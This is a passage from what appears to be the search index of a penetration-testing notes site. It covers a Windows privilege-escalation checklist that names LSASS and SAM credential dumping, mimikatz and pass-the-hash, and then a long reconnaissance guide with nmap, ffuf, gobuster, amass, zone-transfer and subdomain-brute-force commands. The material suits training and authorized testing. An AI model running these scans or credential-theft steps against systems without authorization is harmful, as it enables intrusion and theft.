• Services:
  • DLL Hijacking.
  • Unquoted Path.
  • Named Pipes.
  • Registry.
  • Windows binaries: LOLBAS.
  • binPath.
  • Abusing a service with PowerUp.ps1.
• Kernel.
• Password Mining:
  • Cached SAM.
  • Cached LSASS.
  • Pass The Hash.
  • Configuration files: unattend.xml, SiteList.xml, web.config, vnc.ini.
  • Logs.
  • Credentials in recently accessed files/executed commands.
  • Memory: mimikatz, Process Dump (minidump).
  • .rdp Files.
  • Registry: HKCU\Software\USERNAME\PuTTY\Sessions, AutoLogon, VNC.
• Registry:
  • Autorun.
  • AlwaysInstallElevated.
• Scheduled Tasks:
  • Binary Overwrite.
  • Missing binary.
• Hot Potato.
• Startup Applications.
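A few quick manual checks for some of these vectors (a minimal sketch using built-in Windows commands):

:: Current token privileges\nwhoami /priv\n\n:: AlwaysInstallElevated (exploitable if set to 1 in both hives)\nreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated\nreg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated\n\n:: Unquoted service paths outside C:\Windows\nwmic service get name,pathname,startmode | findstr /i /v "C:\Windows" | findstr /i /v """\n\n:: Scheduled tasks\nschtasks /query /fo LIST /v\n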
                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-tools","title":"Privilege escalation tools","text":"
• CrackMapExec.
                        • mimikatz.
                        ","tags":["privilege escalation","windows"]},{"location":"information-gathering/","title":"Information gathering","text":"Sources for these notes
                        • Hack The Box: Penetration Testing Learning Path
                        • INE eWPT2 Preparation course
                        • OWASP Web Security Testing Guide 4.2 > 1. Information Gathering
• My own notes from pentesting experience.
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#methodology","title":"Methodology","text":"

                        Information gathering is typically broken down into two types:

                        • Passive information gathering - Involves gathering as much information as possible without actively engaging with the target.
                        • Active information gathering/Enumeration - Involves gathering as much information as possible by actively engaging with the target system. (You will require authorization in order to perform active information gathering).
Passive Information Gathering | Active Information Gathering/Enumeration
--- | ---
Identifying domain names and domain ownership information. | Identify website content structure.
Discovering hidden/disallowed files and directories. | Downloading & analyzing website/web app source code.
Identifying web server IP addresses & DNS records. | Port scanning & service discovery.
Identifying web technologies being used on target sites. | Web server fingerprinting.
WAF detection. | Web application scanning.
Identifying subdomains. | DNS Zone Transfers.
Identify website content structure. | Subdomain enumeration via Brute-Force.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#1-passive-information-gathering","title":"1. Passive information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#11-fingerprint-web-server","title":"1.1. Fingerprint Web Server","text":"

                        Or Passive server enumeration.

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.2 | WSTG-INFO-02 | Fingerprint Web Server | Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#host-command","title":"host command","text":"

                        DNS lookup utility.

                        host domain.com\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whois-command","title":"whois command","text":"

                        WHOIS is a query and response protocol that is used to query databases that store the registered users or organizations of an internet resource like a domain name or an IP address block.

                        WHOIS lookups can be performed through the command line interface via the whois client or through some third party web-based tools to lookup the domain ownership details from different databases.

                         whois $TARGET\n
                        whois.exe <TARGET>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#netcraft","title":"netcraft","text":"

Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration allows it.

Netcraft also reports further details: the CMS in use, server-side technologies, and more.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censys","title":"censys","text":"

                        https://search.censys.io/

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan","title":"Shodan","text":"
                        • https://www.shodan.io/
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wayback-machine","title":"Wayback machine","text":"

                        We can access several versions of these websites using the Wayback Machine to find old versions that may have interesting comments in the source code or files that should not be there.

                        We can also use the tool waybackurls to inspect URLs saved by Wayback Machine and look for specific keywords. Installation:

                        go install github.com/tomnomnom/waybackurls@latest\n

                        Basic usage:

                        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#12-passive-dns-enumeration","title":"1.2. Passive DNS enumeration","text":"

                        A valuable resource for this information is the Domain Name System (DNS). We can query DNS to identify the DNS records associated with a particular domain or IP address.

                        • Complete DNS enumeration guide: definition and techniques.

Some of these tools can also be used in active DNS enumeration.

                        Worth trying: DNSRecon.
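A minimal dnsrecon sketch (example.com is a placeholder):

dnsrecon -d example.com\n# -d: target domain; the default scan queries SOA, NS, A, AAAA, MX and SRV records\n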

Tool + Cheat sheet | What it does
--- | ---
Google dorks | Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.
crt.sh | It collects information about SSL certificates. If you visit a domain and it contains a certificate, you can extract other subdomains by using the View Certificate functionality.
dnscan | Python wordlist-based DNS subdomain scanner.
DNSRecon | Preinstalled with Linux: dnsrecon is a simple Python script that enables you to gather DNS-oriented information on a given target.
dnsdumpster.com | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attacker's perspective is an important part of the security assessment process.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#13-reviewing-server-metafiles","title":"1.3. Reviewing server metafiles","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.5 | WSTG-INFO-05 | Review Webpage Content for Information Leakage | - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

                        Some of these files:

                        • robots.txt
                        • sitemap.xml
                        • security.txt (proposed standard which allows websites to define security policies and contact details.)
• humans.txt (initiative for knowing the people behind a website.)
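A quick loop to fetch these files (a minimal sketch; target.com is a placeholder, and security.txt is requested at its .well-known location):

for f in robots.txt sitemap.xml .well-known/security.txt humans.txt; do echo "== $f =="; curl -s "http://target.com/$f"; done\n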
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#14-conduct-search-search-engine-discovery","title":"1.4. Conduct search Search Engine Discovery","text":"

                        Dorking

                        • Complete google dork guide.
                        • Complete github dork guide.
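A few illustrative dorks (example.com and example are placeholders):

# Google: find indexed PDF files on the target\nsite:example.com filetype:pdf\n\n# Google: look for login or admin pages\nsite:example.com inurl:login OR inurl:admin\n\n# GitHub: search an organization's repositories for likely secrets\norg:example password OR api_key\n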

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.1 | WSTG-INFO-01 | Conduct Search Engine Discovery Reconnaissance for Information Leakage | Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#15-fingerprint-web-application-technology-and-frameworks","title":"1.5. Fingerprint web application technology and frameworks","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.8 | WSTG-INFO-08 | Fingerprint Web Application Framework | - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.

                        If we discover the webserver behind the target application, it can give us a good idea of what operating system is running on the back-end server.

                        For instance:

                        • IIS 6.0: Windows Server 2003
                        • IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2
                        • IIS 10.0 (v1607-v1709): Windows Server 2016
                        • IIS 10.0 (v1809-): Windows Server 2019

Although this is usually correct when dealing with Windows, we cannot be sure in the case of Linux or BSD-based distributions, as they can run many different web server versions.

                        How to spot a web server?

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers","title":"HTTP headers","text":"

X-Powered-By and cookies:
• .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE>
• PHP: PHPSESSID=<COOKIE_VALUE>
• JAVA: JSESSIONID=<COOKIE_VALUE>

                        More manual techniques on OWASP 4.2: WSTG-INFO-08

                        Banner Grabbing / Web Server Headers
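A manual banner grab with netcat (a minimal sketch; target.com is a placeholder — after connecting, type the request and press Enter twice):

nc target.com 80\nHEAD / HTTP/1.0\n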

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb","title":"whatweb","text":"

whatweb.

                        whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wappalyzer","title":"Wappalyzer","text":"

Wappalyzer.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f","title":"wafw00f","text":"

wafw00f:

                        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#aquatone","title":"Aquatone","text":"

                        Aquatone

                        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#builtwith","title":"BuiltWith","text":"

                        Addons BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#curl","title":"Curl","text":"

                        Curl:

                        curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap","title":"nmap","text":"

                        nmap:

                        sudo nmap -v $ip --script banner.nse\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#16-waf-detection","title":"1.6. WAF detection","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f_1","title":"wafw00f","text":"

wafw00f:

                        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_1","title":"nmap","text":"

                        nmap:

                        nmap -p443 --script http-waf-detect <host>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#17-code-analysis-httrack-and-eyewitness","title":"1.7. Code analysis: HTTRack and EyeWitness","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.7 | WSTG-INFO-07 | Map Execution Paths Through Application | - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#httrack","title":"HTTRack","text":"

                        HTTRack tutorial

Create a folder into which to mirror your target site.

                        mkdir targetsite\nhttrack domain.com  targetsite/\n

                        Interactive mode:

                        httrack\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#eyewitness","title":"EyeWitness","text":"

                        EyeWitness tutorial

                        First, create a file with the target domains, like for instance, listOfdomains.txt.

                        Then, run:

                        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

After that you will get a report.html file with the requests and screenshots of those domains.

                        # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#18-passive-crawling-with-burp-suite","title":"1.8. Passive crawling with Burp Suite","text":"

                        Crawling is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it.

Crawling is typically passive, as engagement with the target is done via what is publicly accessible. We can utilize Burp Suite's passive crawler to help us map out the web application to better understand how it is set up and how it works.

Burp Suite Community edition only has the Crawler feature available. For spidering, you need the Pro edition.

                        OWASP Zap has both Spider and Crawler features available.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#2-active-information-gathering","title":"2. Active information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#21-enumerate-applications-and-services-on-webserver","title":"2.1. Enumerate applications and services on Webserver","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.4 | WSTG-INFO-04 | Enumerate Applications on Webserver | - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers.

                        Hostname discovery

                        nmap --script smb-os-discovery $ip\n

                        Scanning the IP looking for services:

nmap -sV -sC <target>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#22-web-server-fingerprinting","title":"2.2. Web Server Fingerprinting","text":"

                        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

ID | Link to Hackinglife | Link to OWASP | Objectives
--- | --- | --- | ---
1.2 | WSTG-INFO-02 | Fingerprint Web Server | Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers-and-source-code","title":"HTTP headers and source code","text":"

HTTP headers and HTML source code (with Burp Suite and curl), or Ctrl+U in the browser to view the source code.

                        • Note the response header Server, X-Powered-By, or X-Generator as well.
                        • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                        • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_2","title":"nmap","text":"

Conduct a scan:

                        nmap -sV -F target\n

                        If a server version found is potentially vulnerable, use searchsploit:

                        searchsploit apache 2.4.18\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#metasploit","title":"metasploit","text":"

                        Additionally you can use metasploit:

use auxiliary/scanner/http/http_version\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb_1","title":"whatweb","text":"

                        whatweb.

                        # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors $ip/24\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nikto","title":"Nikto","text":"

                        nikto.

                        nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#23-directoryfile-enumeration","title":"2.3. Directory/File enumeration","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_3","title":"nmap","text":"
                        nmap -sV -p80 --script=http-enum <target>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dirb","title":"dirb","text":"

                        Cheat sheet with dirb.

                        dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster","title":"gobuster","text":"

                        Gobuster:

gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r\n# -b: exclude specific HTTP status codes from the results\n# -r: follow redirects\n# -x: append these extensions to the paths provided by the dictionary\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#ffuf","title":"Ffuf","text":"

                        Ffuf:

                        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz","title":"Wfuzz","text":"

                        Wfuzz
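A directory-fuzzing sketch with wfuzz (the wordlist path assumes the dirb package is installed; target.com is a placeholder):

wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ\n# -z file,<path>: take payloads from a wordlist file\n# --hc 404: hide 404 responses\n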

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#feroxbuster","title":"feroxbuster","text":"

                        feroxbuster
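A minimal feroxbuster sketch (the wordlist path assumes SecLists is installed; target.com is a placeholder):

feroxbuster -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt -t 50\n# -u: target URL\n# -w: wordlist\n# -x: extensions to append to each word\n# -t: number of concurrent threads\n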

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#amass","title":"amass","text":"

                        amass

amass enum -active -d crapi.apisec.ai -ip -brute -dir path/to/save/results/\n# enum: Perform enumerations and network mapping\n# -active: Attempt zone transfers and certificate name grabs, among others\n# -ip: Show IP addresses of cached subdomains\n# -brute: Perform a brute-force DNS attack\n\namass enum -passive -d crapi.apisec.ai -src -dir path/to/save/results/\n# enum: Perform enumerations and network mapping\n# -passive: Perform a passive scan\n# -src: Display sources of the host domain\n# -dir: Specify a folder to save results\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumeration; it automates active enumeration\n

                        Some flags:

-active: Attempt zone transfer and certificate name grabs.\n-passive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: Specify a domain\n-ip: Show IP addresses of cached subdomains\n--include-unresolvable: Output DNS names that did not resolve\n-o file.txt: Output the results into a file\n-w: Path to a different wordlist file\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#spidering-with-owasp-zap","title":"Spidering with OWASP ZAP","text":"

Spidering is an active technique. It's the process of automatically discovering new resources (URLs) on a web application/site. It typically begins with a list of target URLs called seeds, after which the spider will visit the URLs, identify hyperlinks in each page, and add them to the list of URLs to visit, repeating the process recursively.

                        Spidering can be quite loud and as a result, it is typically considered to be an active information gathering technique.

                        We can utilize OWASP ZAP\u2019s Spider to automate the process of spidering a web application to map out the web application and learn more about how the site is laid out and how it works.

Burp Suite Community edition only has the Crawler feature available. For spidering, you need the Pro edition.

                        OWASP Zap has both Spider and Crawler features available.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#24-active-dns-enumeration","title":"2.4. Active DNS enumeration","text":"

                        Domain Name System (DNS) is a protocol that is used to resolve domain names/hostnames to IP addresses. During the early days of the internet, users would have to remember the IP addresses of the sites that they wanted to visit, DNS resolves this issue by mapping domain names (easier to recall) to their respective IP addresses.

                        A DNS server (nameserver) is like a telephone directory that contains domain names and their corresponding IP addresses. A plethora of public DNS servers have been set up by companies like Cloudflare (1.1.1.1) and Google (8.8.8.8). These DNS servers contain the records of almost all domains on the internet.

                        DNS interrogation is the process of enumerating DNS records for a specific domain. The objective of DNS interrogation is to probe a DNS server to provide us with DNS records for a specific domain. This process can provide us with important information like the IP address of a domain, subdomains, mail server addresses etc.

                        More about DNS enumeration.

Tool + Cheat sheet | What it does
--- | ---
dnsenum | Multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.
dig | Discover non-contiguous IP blocks.
fierce | DNS scanner that helps locate non-contiguous IP space and hostnames.
dnscan | Python wordlist-based DNS subdomain scanner.
gobuster | For brute-force enumerations.
nslookup | DNS lookup utility.
amass | In-depth DNS enumeration and network mapping.
","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum","title":"dnsenum","text":"

                        dnsenum Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. Used for active fingerprinting:

                        dnsenum domain.com\n

One cool thing about dnsenum is that it can perform DNS zone transfers, like dig. dnsenum performs DNS brute force with /usr/share/dnsenum/dns.txt.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dig","title":"dig","text":"

                        Additionally, see dig axfr.

                        dig (More complete cheat sheet: dig)

# Syntax for transferring a DNS zone\ndig axfr @nameserver example.com\n\n# Get the email of the administrator of the domain\ndig soa www.example.com\n# The email will contain a dot (.) instead of an @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# ns: other name servers are listed in NS records\n# the '@' character specifies the DNS server we want to query\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. Query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce","title":"Fierce","text":"

                        Fierce (More complete cheat sheet: fierce)

# Perform a DNS transfer using a wordlist against domain.com\nfierce -dns domain.com\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnscan","title":"DNScan","text":"

                        DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

dnscan.py (-d <domain> | -l <list>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_1","title":"gobuster","text":"

                        gobuster (More complete cheat sheet: gobuster)

                        gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nslookup","title":"nslookup","text":"

                        nslookup (More complete cheat sheet: nslookup)

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#25-subdomain-enumeration","title":"2.5. Subdomain enumeration","text":"

Using a SecLists wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sublist3r","title":"Sublist3r","text":"

Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Easily blocked by Google.

                        python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce_1","title":"fierce","text":"
                        # Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_2","title":"gobuster","text":"

                        Gobuster:

                        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz_1","title":"wfuzz","text":"

                        Wfuzz:

wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H "Host: FUZZ.nunchucks.htb" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent threads\n# -u https://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist\n# -H "Host: FUZZ.nunchucks.htb": Header; "FUZZ" marks the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines, in this case 546\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum_1","title":"dnsenum","text":"

                        Using dnsenum.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#bash-script-with-dig-and-seclist","title":"Bash script with dig and seclist","text":"

Bash script, using a SecLists wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-vhost-enumeration","title":"2.6. VHOST enumeration","text":"

                        A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

                        There are two ways to configure virtual hosts:

                        • IP-based virtual hosting
                        • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.

                        vHost Fuzzing

                        # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

                        vHost Fuzzing with ffuf:

                        # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-certificate-enumeration","title":"2.6. Certificate enumeration","text":"

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use (for instance, when gathering information to prepare a phishing attack).

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sslyze-and-sslabs","title":"sslyze and sslabs","text":"

For this we can use:
• sslyze
• SSL Labs by Qualys
• https://ciphersuite.info
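A minimal sslyze sketch (CLI flags vary between sslyze versions; example.com is a placeholder):

sslyze example.com\n# Scans port 443 by default and reports supported cipher suites, certificate details, and common TLS misconfigurations\n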

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_4","title":"nmap","text":"

                        Also, you can use a script for nmap:

                        nmap --script ssl-enum-ciphers <HOSTNAME>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#virustotal","title":"virustotal","text":"

                        virustotal.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#crtsh-with-curl","title":"crt.sh with curl","text":"

                        crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

                        # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n\ncurl -s \"https://crt.sh/?q=${TARGET}&output=json\" | jq -r '.[] | \"\\(.name_value)\\n\\(.common_name)\"' | sort -u > \"${TARGET}_crt.sh.txt\"\n# curl -s: Issue the request with minimal output.\n# https://crt.sh/?q=<DOMAIN>&output=json: Ask for the json output.\n# jq -r '.[]' \"\\(.name_value)\\n\\(.common_name)\"': Process the json output and print certificate's name value and common name one per line.\n# sort -u: Sort alphabetically the output provided and removes duplicates.\n\n# We also can manually perform this operation against a target using OpenSSL via:\nopenssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' -connect \"${TARGET}:${PORT}\" | openssl x509 -noout -text -in - | grep 'DNS' | sed -e 's|DNS:|\\n|g' -e 's|^\\*.*||g' | tr -d ',' | sort -u\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censysio","title":"censys.io","text":"

